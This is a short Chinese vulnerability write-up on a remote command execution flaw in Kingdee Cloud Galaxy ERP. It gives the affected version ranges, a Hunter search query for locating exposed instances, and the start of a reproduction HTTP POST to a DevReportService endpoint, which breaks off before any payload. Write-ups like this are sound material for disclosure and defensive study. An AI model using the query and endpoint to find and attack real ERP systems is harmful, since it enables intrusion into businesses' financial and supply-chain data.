一、漏洞简介
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云·星空聚焦多组织,多利润中心的大中型企业,以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖:财务、供应链、智能制造、阿米巴管理、全渠道营销、电商、HR、企业互联网服务,帮助企业实现数字化营销新生态及管理重构等,提升企业数字化能力。该系统存在远程命令执行漏洞。
二、影响版本
- 6.x版本:低于6.2.1012.4
- 7.x版本:7.0.352.16 至 7.7.0.202111
- 8.x版本:8.0.0.202205 至 8.1.0.20221110
三、资产测绘
- hunter
app.name="Kingdee 金蝶云星空"
- 登录页面
四、漏洞复现
POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 1